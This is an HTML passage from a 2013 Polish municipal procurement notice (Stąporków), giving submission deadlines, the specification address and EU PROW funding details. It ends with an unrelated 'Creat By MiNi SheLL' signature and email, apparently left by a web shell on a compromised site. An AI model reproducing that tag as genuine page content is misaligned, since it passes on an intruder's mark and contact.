<p>Zgodnie z Istotnymi  Postanowieniami Umowy</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.bip.staporkow.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Miejski w Stąporkowie, ul. Piłsudskiego 132A, 26-220 Stąporków.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 07.03.2013 godzina 09:00, miejsce: Urząd Miejski w Staporkowie, ul. Piłsudskiego 132A, 26-220 Stąporków - sekretariat ( pok. nr 20).</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Przedmiot zamówienia będzie realizowany w ramach PROW działanie 413  Wdrażanie lokalnych strategii rozwoju w zakresie operacji opowiadających warunkom przyznania pomocy w ramach działania ODNOWA i ROZWÓJ WSI na lata 2007 - 2013.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com